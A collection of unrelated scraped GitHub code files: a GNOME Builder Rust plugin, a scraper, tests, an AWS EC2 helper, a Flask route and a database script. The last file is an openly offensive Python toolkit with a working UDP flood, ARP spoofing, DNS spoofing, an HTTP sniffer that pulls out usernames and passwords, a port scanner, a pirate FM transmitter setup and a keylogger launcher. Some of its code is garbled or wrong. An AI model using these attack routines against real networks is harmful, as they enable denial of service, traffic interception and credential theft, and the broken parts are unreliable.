@GObject.Property(type=Ide.LspClient)\n def client(self):\n return self._client\n\n @client.setter\n def client(self, value):\n self._client = value\n self.notify('client')\n\n def do_parent_set(self, parent):\n \"\"\"\n After the context has been loaded, we want to watch the project\n Cargo.toml for changes if we find one. That will allow us to\n restart the process as necessary to pick up changes.\n \"\"\"\n if parent is None:\n return\n\n context = self.get_context()\n workdir = context.ref_workdir()\n cargo_toml = workdir.get_child('Cargo.toml')\n\n if cargo_toml.query_exists():\n try:\n self._monitor = cargo_toml.monitor(0, None)\n self._monitor.set_rate_limit(5 * 1000) # 5 Seconds\n self._monitor.connect('changed', self._monitor_changed_cb)\n except Exception as ex:\n Ide.debug('Failed to monitor Cargo.toml for changes:', repr(ex))\n\n def _monitor_changed_cb(self, monitor, file, other_file, event_type):\n \"\"\"\n This method is called when Cargo.toml has changed. We need to\n cancel any supervised process and force the language server to\n restart. 
Otherwise, we risk it not picking up necessary changes.\n \"\"\"\n if self._supervisor is not None:\n subprocess = self._supervisor.get_subprocess()\n if subprocess is not None:\n subprocess.force_exit()\n\n def do_stop(self):\n \"\"\"\n Stops the Rust Language Server upon request to shutdown the\n RlsService.\n \"\"\"\n if self._monitor is not None:\n monitor, self._monitor = self._monitor, None\n if monitor is not None:\n monitor.cancel()\n\n if self._supervisor is not None:\n supervisor, self._supervisor = self._supervisor, None\n supervisor.stop()\n\n def _ensure_started(self):\n \"\"\"\n Start the rust service which provides communication with the\n Rust Language Server. We supervise our own instance of the\n language server and restart it as necessary using the\n Ide.SubprocessSupervisor.\n\n Various extension points (diagnostics, symbol providers, etc) use\n the RlsService to access the rust components they need.\n \"\"\"\n # To avoid starting the `rls` process unconditionally at startup,\n # we lazily start it when the first provider tries to bind a client\n # to its :client property.\n if not self._has_started:\n self._has_started = True\n\n # Setup a launcher to spawn the rust language server\n launcher = self._create_launcher()\n launcher.set_clear_env(False)\n sysroot = self._discover_sysroot()\n if sysroot:\n launcher.setenv(\"SYS_ROOT\", sysroot, True)\n launcher.setenv(\"LD_LIBRARY_PATH\", os.path.join(sysroot, \"lib\"), True)\n if DEV_MODE:\n launcher.setenv('RUST_LOG', 'debug', True)\n\n # Locate the directory of the project and run rls from there.\n workdir = self.get_context().ref_workdir()\n launcher.set_cwd(workdir.get_path())\n\n # If rls was installed with Cargo, try to discover that\n # to save the user having to update PATH.\n path_to_rls = os.path.expanduser(\"~/.cargo/bin/rls\")\n if os.path.exists(path_to_rls):\n old_path = os.getenv('PATH')\n new_path = os.path.expanduser('~/.cargo/bin')\n if old_path is not None:\n new_path += os.path.pathsep + old_path\n launcher.setenv('PATH', new_path, True)\n else:\n path_to_rls = \"rls\"\n\n # Setup our Argv. We want to communicate over STDIN/STDOUT,\n # so it does not require any command line options.\n launcher.push_argv(path_to_rls)\n\n # Spawn our peer process and monitor it for\n # crashes. We may need to restart it occasionally.\n self._supervisor = Ide.SubprocessSupervisor()\n self._supervisor.connect('spawned', self._rls_spawned)\n self._supervisor.set_launcher(launcher)\n self._supervisor.start()\n\n def _rls_spawned(self, supervisor, subprocess):\n \"\"\"\n This callback is executed when the `rls` process is spawned.\n We can use the stdin/stdout to create a channel for our\n LspClient.\n \"\"\"\n stdin = subprocess.get_stdin_pipe()\n stdout = subprocess.get_stdout_pipe()\n io_stream = Gio.SimpleIOStream.new(stdout, stdin)\n\n if self._client:\n self._client.stop()\n self._client.destroy()\n\n self._client = Ide.LspClient.new(io_stream)\n self.append(self._client)\n self._client.add_language('rust')\n self._client.start()\n self.notify('client')\n\n def _create_launcher(self):\n \"\"\"\n Creates a launcher to be used by the rust service. This needs\n to be run on the host because we do not currently bundle rust\n inside our flatpak.\n\n In the future, we might be able to rely on the runtime for\n the tooling. 
Maybe even the program if flatpak-builder has\n prebuilt our dependencies.\n \"\"\"\n flags = Gio.SubprocessFlags.STDIN_PIPE | Gio.SubprocessFlags.STDOUT_PIPE\n if not DEV_MODE:\n flags |= Gio.SubprocessFlags.STDERR_SILENCE\n launcher = Ide.SubprocessLauncher()\n launcher.set_flags(flags)\n launcher.set_cwd(GLib.get_home_dir())\n launcher.set_run_on_host(True)\n return launcher\n\n def _discover_sysroot(self):\n \"\"\"\n The Rust Language Server needs to know where the sysroot is of\n the Rust installation we are using. This is simple enough to\n get, by using `rust --print sysroot` as the rust-language-server\n documentation suggests.\n \"\"\"\n for rustc in ['rustc', os.path.expanduser('~/.cargo/bin/rustc')]:\n try:\n launcher = self._create_launcher()\n launcher.push_args([rustc, '--print', 'sysroot'])\n subprocess = launcher.spawn()\n _, stdout, _ = subprocess.communicate_utf8()\n return stdout.strip()\n except:\n pass\n\n @classmethod\n def bind_client(klass, provider):\n \"\"\"\n This helper tracks changes to our client as it might happen when\n our `rls` process has crashed.\n \"\"\"\n context = provider.get_context()\n self = RlsService.from_context(context)\n self._ensure_started()\n self.bind_property('client', provider, 'client', GObject.BindingFlags.SYNC_CREATE)\n\nclass RlsDiagnosticProvider(Ide.LspDiagnosticProvider, Ide.DiagnosticProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsCompletionProvider(Ide.LspCompletionProvider, Ide.CompletionProvider):\n def do_load(self, context):\n RlsService.bind_client(self)\n\n def do_get_priority(self, context):\n # This provider only activates when it is very likely that we\n # want the results. So use high priority (negative is better).\n return -1000\n\nclass RlsRenameProvider(Ide.LspRenameProvider, Ide.RenameProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsSymbolResolver(Ide.LspSymbolResolver, Ide.SymbolResolver):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHighlighter(Ide.LspHighlighter, Ide.Highlighter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsFormatter(Ide.LspFormatter, Ide.Formatter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHoverProvider(Ide.LspHoverProvider, Ide.HoverProvider):\n def do_prepare(self):\n self.props.category = 'Rust'\n self.props.priority = 200\n RlsService.bind_client(self)\n","repo_name":"acidburn0zzz/gnome-builder","sub_path":"src/plugins/rls/rls_plugin.py","file_name":"rls_plugin.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21544538572","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = raw_input('type Url:')\r\n#url = 'http://www.meitulu.com/item/8696.html'\r\n#http://www.meitulu.com/item/3499.html\r\nress = requests.get(url)\r\nress.encoding = 'utf-8'\r\nsoup = BeautifulSoup(ress.text,'html.parser')\r\n\r\nfor link in soup.select('a'):\r\n item = 'http://www.meitulu.com/item/'\r\n aa = link.get('href')\r\n if aa[0:28] == item:\r\n ress2 = requests.get(aa)\r\n ress2.encoding = 'utf-8'\r\n soup2 = BeautifulSoup(ress2.text,'html.parser')\r\n #print (soup2)\r\n #soup2 = soup2.find_all('img') \r\n soup2 = soup2.find_all(\"img\",class_=\"content_img\")\r\n for list in soup2: \r\n linkk = list.get('src')\r\n print 
(linkk)\r\n\r\n\r\n\r\n","repo_name":"zxcke/GetPic","sub_path":"getlist--.py","file_name":"getlist--.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10634035675","text":"from src.mobile.npc.player.player import Player\nfrom src.mobile.npc.mobs.merchant import Merchant\nfrom src.equipment.items import glasses\nfrom src.equipment.weapons import player_knife\n\n\ndef test_init(player):\n assert player.name == \"Vasiliy\"\n\n\ndef test_heal(player):\n player.max_hp = 20\n player.hp = 18\n player.heal()\n assert player.hp == 20\n\n\ndef test_do_showshopitems(world):\n player = world.add(Player('Petya'), (0, 0))\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n m = world.add(Merchant(), (0, 10)).start_equip()\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n world.add(Merchant(), (0, 1)).start_equip()\n player.showshopitems()\n assert player.last_happend != 'Petya спросил никого о торгах'\n\n\ndef test_do_share(world):\n p1 = Player('Штирлиц')\n p1_inv_before = p1.inventory\n p1.position = (10, 0)\n p2 = Player('Исаев')\n p2_inv_before = p2.inventory\n p2.position = (0, 0)\n world.players[(0, 0)] = p2\n p1.world = world\n p1.inventory += [glasses()]\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц слишком далеко от Исаев'\n assert p2.inventory == p2_inv_before\n\n p1.position = (0, 0)\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц передал очки в руки Исаев'\n assert p2.inventory[-1].name == 'очки'\n assert len(p1.inventory) == len(p1_inv_before)\n\n p1.share('Исаев', 'очки')\n assert p1.last_happend == \"Штирлиц не может дать очки в руки Исаев\"\n\n\ndef test_do_equip(player):\n player.inventory = [player_knife()]\n assert player.equipment['основное'] is None\n player.equip('меч')\n assert player.equipment['основное'].name == 'меч'\n assert player.equipment['основное'].user == player\n","repo_name":"arovesto/underdanger","sub_path":"test/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19918982253","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nplt.style.use('paper')\nimport numpy\n\ndef plot():\n training_seen, train_losses = numpy.genfromtxt('training_results.txt', skip_header = 1, usecols = (0,1)).T\n test_seen, test_losses, acc = numpy.genfromtxt('test_result.txt', skip_header = 1, usecols = (0,1,2)).T\n fig, ax = plt.subplots()\n ax2 = ax.twinx()\n lns1 = ax.plot(training_seen, train_losses, label = 'train losses')\n lns2 = ax.plot(test_seen, test_losses, 'o', label = 'test losses')\n lns3 = ax2.plot(test_seen, acc, 'o-', color = 'C2', label = 'accuracy')\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax.set_xlabel('Number of samples seen')\n ax.set_ylabel('Loss')\n ax2.set_ylabel('accuracy (%)')\n ax.legend(lns, labs, loc = 'center right')\n fig.savefig('training_result.png', dpi = 600)\n\n\nif __name__ == \"__main__\":\n plot()\n","repo_name":"SamarthSingh2001/LicencePI","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30073253429","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = 
open(name)\ncounts = dict()\nfor line in handle :\n if line.startswith(\"From:\") :\n continue\n elif line.startswith(\"From\") :\n words = line.split()\n words = words[5]\n words = words[0:2]\n counts[words] = counts.get(words,0) + 1\n\nfor k,v in sorted(counts.items()) :\n print(k,v)\n","repo_name":"rahamanankit/my-python-codes","sub_path":"tuples1.py","file_name":"tuples1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71377962293","text":"\nimport matplotlib.pyplot as plt\nimport importlib\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks\nimport sys\nimport seaborn as sns\n\nfrom epstein_civil_violence.agent import Citizen, Cop\nfrom epstein_civil_violence.model import EpsteinCivilViolence\n\nimport time\n\nlegitimacy = \"Global\" # choose between \"Fixed\",\"Global\",\"Local\"\nnetwork = \"Barabasi\" # Choose between \"Barabasi\", \"Renyi\" and Small-world\nmax_iters = 200 # Choose for how many iterations you want the model to run\n\n\nstart = time.time()\nmodel = EpsteinCivilViolence(height=40, \n width=40, \n citizen_density=.7, \n cop_density=0.04, \n citizen_vision=7, \n cop_vision=7, \n legitimacy=.82, \n max_jail_term=30, \n max_iters=max_iters, \n smart_cops = False,\n legitimacy_kind = legitimacy, \n max_fighting_time=1,\n network = network,\n ) \nmodel.run_model()\n\n# Showing the time it takes to run the model\nfinish = time.time()\nprint(\"Time =\",finish-start)\n\n# Getting the data from the data collector\nmodel_out = model.datacollector.get_model_vars_dataframe()\nagent_out = model.datacollector.get_agent_vars_dataframe()\n\n# Shows the amount of active citizens and statistics\nprint(\"Mean amount of active citizens per step = \",model_out[\"Active\"].mean())\nprint(\"Std of amount of active citizens per step = \",model_out[\"Active\"].std())\nprint(\"Maximum of amount of active citizens in a time step = \",model_out[\"Active\"].max())\n\n# line 59 - 78 give back measured properties of the model\npeaks, _ = find_peaks(model_out[\"Active\"], height=50)\nprint(\"Indices of peaks:\", peaks, \"Amount:\", len(peaks))\n\nactives_list = model_out[\"Active\"].to_list()\nfor peak in peaks:\n print(\"Peak of \", actives_list[peak], \"citizens\")\n\npeak_intervals = []\nif len(peaks)>1:\n for i in range(len(peaks)-1):\n peak_intervals.append(peaks[i+1] - peaks[i])\nprint(\"Peak intervals = \",peak_intervals)\n\ntime_between = []\ntime = 0\ntotal_active = 0\n\ncount1, count2 = False, False\nfor i in range(1,len(actives_list)-1):\n if actives_list[i] < 50 and actives_list[i+1] >= 50:\n count1 = False\n time_between.append(time-1)\n time = 0\n if actives_list[i] >= 50 and actives_list[i+1] < 50:\n count1 = True\n if count1 == True:\n time += 1\n\nprint(\"Times of inter-outerbursts\", time_between)\n\n# Makes a plot of the state of the citizens\nax = model_out[[\"Quiescent\",\"Active\", \"Jailed\", \"Fighting\"]].plot()\nax.set_title('Citizen Condition Over Time')\nax.set_xlabel('Step')\nax.set_ylabel('Number of Citizens')\n_ = ax.legend(bbox_to_anchor=(1.35, 1.025))\nplt.tight_layout()\n\nplt.show()\n\n# Makes a plot of perceived legitimacy\nif legitimacy != \"Local\":\n ax = model_out[[\"Legitimacy\"]].plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n plt.tight_layout()\n 
plt.show()\n\n\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1040', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1041', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1042', axis = 0 ).head())\n\nif legitimacy == \"Local\":\n ax = agent_out[\"Legitimacy\"].filter(like='1040', axis = 0 ).plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n \n plt.tight_layout()\n plt.show()","repo_name":"DCCdelang/ABM","sub_path":"epstein_civil_violence_Normal+Network Grid/model_run.py","file_name":"model_run.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32015866694","text":"import botocore\r\nimport botocore.exceptions\r\nfrom Logger import Logger\r\nfrom Config import AWS_REGION\r\n\r\n\r\nclass EC2Controller:\r\n # A class for controlling interactions with the boto3 EC2 Resource and Client Interface\r\n\r\n INSTANCES_DISPLAY_FORMAT = ' {0}({1}) \\t {2} - {3} <RegionInfo:{4}> \\t <Launched On:{5}>'\r\n DEVICE_DISPLAY_FORMAT = \"\\t\\t'{}'\\t '{}'\"\r\n MSG_INFO_AMI_CREATED = \"AMI created: {}['{}']\"\r\n MSG_INFO_INSTANCE_CREATED = \"Instance created.{}\"\r\n MSG_INFO_INSTANCE_STARTING = \"Starting instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STARTED = \"Instance started:'{}'\"\r\n MSG_INFO_INSTANCE_STOPPING = \"Stopping instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STOPPED = \"Instance stopped:'{}'\"\r\n MSG_INFO_RUNNING_INSTANCE = \"Running EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_INSTANCE = \"Stopped EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_RUNNING_INSTANCE = \"Available EC2 Instances: {}\"\r\n MSG_WARN_NO_INSTANCE = \"There is no EC2 Instance at this moment..\"\r\n MSG_WARN_NO_RUNNING_INSTANCE = \"There is no running EC2 Instance at this moment..\"\r\n MSG_WARN_NO_STOPPED_INSTANCE = \"There is no stopped EC2 Instance at this moment..\"\r\n MSG_WARN_NO_INSTANCE_FOR_EMI = \"There is no EC2 Instance for AMI creation at this moment..\"\r\n MSG_INFO_VOL_FROM_SNAP_CREATED = \"Volume created: {0}({1}) \\t {2}-{3} <ZoneInfo:{4}> \\t <Created On:{5}>\"\r\n STR_AWS_INSTANCE = \"<AWS EC2 Instances>\"\r\n STR_ATTACHED_DEVICE = \"\\t\\t<Instance({}) attached block devices Info>\"\r\n\r\n def __init__(self, ec2res, ec2client):\r\n # EC2Controller Constructor, assigns the ec2 Resource \"ec2res\" and \"ec2client\" Client to this controller\r\n self.ec2_res = ec2res\r\n self.ec2_client = ec2client\r\n\r\n def start_instance(self, instance_id):\r\n # Start instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.start()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTING.format(instance_id))\r\n # Wait for instance start operation to complete\r\n instance.wait_until_running()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def stop_instance(self, instance_id):\r\n # Stop instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.stop()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPING.format(instance_id))\r\n # Wait for instance stop operation to complete\r\n instance.wait_until_stopped()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n 
Logger.err(str(error))\r\n\r\n def list_instances(self):\r\n # List all EC2 instances\r\n return self.list_all_instances(self.ec2_res.instances.all())\r\n\r\n def list_all_instances(self, instances):\r\n count = 0\r\n running_instances = []\r\n pending_instances = []\r\n shutting_down_instances = []\r\n terminated_instances = []\r\n stopping_instances = []\r\n stopped_instances = []\r\n # Loop through all EC2 instances\r\n for instance in instances:\r\n instance_info = [instance.id, instance.state['Name'], instance.image_id, instance.instance_type,\r\n AWS_REGION, instance.launch_time]\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance_info)\r\n elif instance.state['Name'] == \"pending\":\r\n pending_instances.append(instance_info)\r\n elif instance.state['Name'] == \"shutting-down\":\r\n shutting_down_instances.append(instance_info)\r\n elif instance.state['Name'] == \"terminated\":\r\n terminated_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopping\":\r\n stopping_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance_info)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE)\r\n else:\r\n Logger.header(self.STR_AWS_INSTANCE)\r\n for running_instance in running_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*running_instance))\r\n for pending_instance in pending_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*pending_instance))\r\n for stopping_instance in stopping_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopping_instance))\r\n for stopped_instance in stopped_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopped_instance))\r\n for shutting_down_instance in shutting_down_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*shutting_down_instance))\r\n for terminated_instance in terminated_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*terminated_instance))\r\n return count\r\n\r\n def list_running_instance(self):\r\n # List all running EC2 instances\r\n count = 0\r\n running_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_RUNNING_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_RUNNING_INSTANCE.format(running_instances))\r\n return running_instances\r\n\r\n def list_stopped_instance(self):\r\n # List all stopped EC1 instances\r\n count = 0\r\n stopped_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_STOPPED_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_INSTANCE.format(stopped_instances))\r\n return stopped_instances\r\n\r\n def list_stopped_running_instances(self):\r\n # List all stopped and running EC2 instances\r\n count = 0\r\n available_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if 
instance.state['Name'] == \"running\" or instance.state['Name'] == \"stopped\":\r\n available_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE_FOR_EMI)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_RUNNING_INSTANCE.format(available_instances))\r\n return available_instances\r\n\r\n def instance_attached_block_devices(self, instance_id):\r\n # Any block device mapping entries for the instance\r\n count = 0\r\n instance = self.ec2_res.Instance(instance_id)\r\n attached_block_devices = []\r\n attached_devices_details = []\r\n bdm = instance.block_device_mappings\r\n for device in bdm:\r\n attached_block_devices.append(device['DeviceName'])\r\n ebs = device['Ebs']\r\n device_info = [device['DeviceName'], ebs['VolumeId']]\r\n attached_devices_details.append(device_info)\r\n count += 1\r\n if count > 0:\r\n Logger.header(self.STR_ATTACHED_DEVICE.format(instance_id))\r\n for devices_detail in attached_devices_details:\r\n Logger.sub_info(self.DEVICE_DISPLAY_FORMAT.format(*devices_detail))\r\n return attached_block_devices\r\n\r\n def instance_platform_name(self, instance_id):\r\n # instance platform name\r\n platform = self.ec2_res.Instance(instance_id).platform\r\n return platform\r\n\r\n def instance_state(self, instance_id):\r\n # instance state name\r\n state = self.ec2_res.Instance(instance_id).state['Name']\r\n return state\r\n\r\n def instance_root_device_name(self, instance_id):\r\n # instance root device name\r\n root_device_name = self.ec2_res.Instance(instance_id).root_device_name\r\n return root_device_name\r\n\r\n def create_instance(self, image_id, instance_type):\r\n # create a new EC2 instance with the given AMI Image ID\r\n try:\r\n instance = self.ec2_res.create_instances(ImageId=image_id, MinCount=1, MaxCount=1,\r\n InstanceType=instance_type)\r\n Logger.info(self.MSG_INFO_INSTANCE_CREATED.format(instance))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_image(self, instance_id, image_name):\r\n # create a new AMI from the given instance ID\r\n try:\r\n image_id = self.ec2_client.create_image(InstanceId=instance_id, Name=image_name)\r\n Logger.info(self.MSG_INFO_AMI_CREATED.format(image_name, image_id['ImageId']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_volume(self, availability_zone, snapshot_id):\r\n # Create a volume from a snapshot\r\n try:\r\n volume = self.ec2_client.create_volume(AvailabilityZone=availability_zone, SnapshotId=snapshot_id)\r\n Logger.info(\r\n self.MSG_INFO_VOL_FROM_SNAP_CREATED.format(volume['VolumeId'], volume['State'], volume['VolumeType'],\r\n str(volume['Size']) + \"GB\",\r\n volume['AvailabilityZone'],\r\n volume['CreateTime']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n","repo_name":"GitPointer/AWS_BOTO3_CLI","sub_path":"AWS_Boto3/EC2.py","file_name":"EC2.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"16250174814","text":"# flake8: noqa\nfrom flask import Blueprint, jsonify\n\nfrom currencyexchange.database.fxrates import FxRate\n\nfxrates = Blueprint('fxrates', __name__)\n\n@fxrates.route('/refresh_fx_rates')\ndef refresh_fx_rates():\n count = FxRate.refresh_from_api()\n if count:\n response = dict(status=\"SUCCESS\", count=count)\n else:\n response = dict(status=\"FAILED\", count=None)\n return 
jsonify(response)\n","repo_name":"jerryshikanga/currency-exchange","sub_path":"currencyexchange/views/fxrates.py","file_name":"fxrates.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19525424570","text":"from sqlalchemy import create_engine, Column, Integer, String, Float\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\nengine = create_engine(\"postgresql+psycopg2://postgres:admin@localhost/postgres\", echo=False)\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\nBase = declarative_base()\r\n\r\nclass SQL_Paint(Base):\r\n __tablename__ = \"paint\"\r\n\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String(50)) # String takes its length as a call argument: String(50), not String[50]\r\n color = Column(String(50))\r\n type = Column(String(50))\r\n sizes = Column(String(50))\r\n prices = Column(String(50))\r\n area = Column(Float)\r\n\r\nBase.metadata.create_all(engine)\r\n\r\ndef addItemToTable():\r\n paint1 = SQL_Paint(name=\"Dulux\", color=\"White\", type=\"Matt\", sizes=\"2.5/5/10\", prices=\"14/18/22\", area=\"13\")\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\n\r\ndef addItemsManually():\r\n name = input(\"name \")\r\n color = input(\"color \")\r\n type = input(\"paint type \")\r\n sizes = input(\"paint sizes \")\r\n prices = input(\"paint prices \")\r\n area = input(\"area \")\r\n\r\n paint1 = SQL_Paint(name=name, color=color, type=type, sizes=sizes, prices=prices, area=area)\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\ndef readDataOffTable():\r\n paints = session.query(SQL_Paint)\r\n for paint in paints:\r\n print(paint.name)\r\n","repo_name":"thes32/flask_Paint_Can","sub_path":"databaseManager.py","file_name":"databaseManager.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31275613576","text":"from pip import main\r\nfrom pip._internal import main\r\nfrom scapy import *\r\nimport scapy.all as scapy\r\nfrom scapy.layers import http\r\nimport socket\r\nimport threading\r\nimport subprocess\r\nimport os \r\nimport socket\r\nimport random \r\nimport time\r\nfrom subprocess import Popen\r\nfrom subprocess import call\r\nimport requests, os, sys, tempfile, subprocess, base64, time\r\nimport os\r\nimport signal\r\nimport csv\r\nimport speedtest\r\nimport datetime\r\nimport re\r\nimport sys\r\nimport webbrowser\r\nimport getopt # needed by DNSspoofer below\r\nimport matplotlib.pyplot as plt # needed by wifispeed below\r\n#https://www.youtube.com/watch?v=5-IRImDXjjc EN EL MINUTO 2:21:59 (spoofer sniffer\r\nlog = \"\"\r\ndef GPS():\r\n print(\"datos que debas conocer:frecuencia de onda\")\r\n frecuencia = input(\"ingrese la frecuencia(HZ)>\") \r\n # wavelength = speed of light / frequency; input() returns a string, so cast it first\r\n distancia = 299792458.0 / float(frecuencia)\r\n print(\"distancia:\" + str(distancia) + \" metros\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\ndef FMhack():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n tipu = input(\"1 or 2?:\")\r\n if tipu == \"1\":\r\n os.system(\"git clone https://github.com/ChristopheJacquet/PiFmRds.git\")\r\n os.system(\"mv PiFmRds/src/* .\")\r\n os.system(\"make clean\")\r\n os.system(\"make\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 waveforms.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 pi_fm_rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 fm_mpx.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 control_pipe.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -O3 -march=armv7-a -mtune=arm1176jzf-s -mfloat-abi=hard -mfpu=vfp -ffast-math -DRASPI=2 mailbox.c\")\r\n os.system(\"gcc -o pi_fm_rds rds.o waveforms.o mailbox.o pi_fm_rds.o fm_mpx.o control_pipe.o -lm -lsndfile\")\r\n os.system(\"clear\")\r\n print(\"monta el arduino en la imagen /hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire.w1456.jpg/\")\r\n print(\" mas info en https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire-0177007/\")\r\n if tipu == \"2\":\r\n freq = input(\"Frecuency-->>\")\r\n os.system(\"sudo ./pi_fm_rds -freq \"+freq+\" -audio audio.wav\")\r\ndef vulnerability():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n x = input(\"1 or 2?:\")\r\n if x == \"1\":\r\n os.system(\"git clone https://github.com/infosecsecurity/Spaghetti\")\r\n os.system(\"mv Spaghetti/* 